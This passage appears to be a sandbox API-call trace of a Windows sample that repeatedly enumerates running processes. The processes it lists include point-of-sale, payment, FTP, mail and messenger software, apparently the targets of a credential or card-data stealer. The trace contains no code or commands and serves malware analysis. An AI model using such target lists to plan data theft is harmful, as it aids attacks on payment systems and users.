cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0185.603] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0185.605] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0185.607] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0185.609] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0185.614] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0185.616] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0185.619] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0185.621] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0185.623] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0185.625] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0185.627] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0185.629] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0185.632] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0185.634] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0185.636] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0185.637] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0185.639] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0185.641] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0185.643] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0185.645] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0185.647] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0185.649] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0185.653] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0185.655] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0185.656] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0185.658] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0185.660] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0185.662] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0185.664] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0185.666] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0185.668] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0185.669] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0185.671] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0185.674] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0185.676] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0185.679] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0185.681] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0185.683] CloseHandle (hObject=0x1bcc) returned 1 [0185.683] Sleep (dwMilliseconds=0x64) [0185.848] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x14a0 [0185.864] Process32First (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.866] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0185.868] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0185.870] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.872] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0185.874] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.875] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0185.878] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0185.880] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0185.882] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.938] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.941] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0185.943] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.945] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.947] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.949] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.950] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.952] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.957] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.960] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0185.962] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0185.964] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.966] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0185.969] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.971] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0185.973] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0185.975] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0185.984] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0185.986] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0185.989] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0185.991] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.993] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0185.995] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0185.998] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0186.000] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.002] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0186.005] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0186.007] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0186.009] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0186.011] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0186.013] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0186.016] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0186.018] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0186.026] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0186.029] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0186.031] Process32Next (in: hSnapshot=0x14a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0186.034] Process32Next (in: 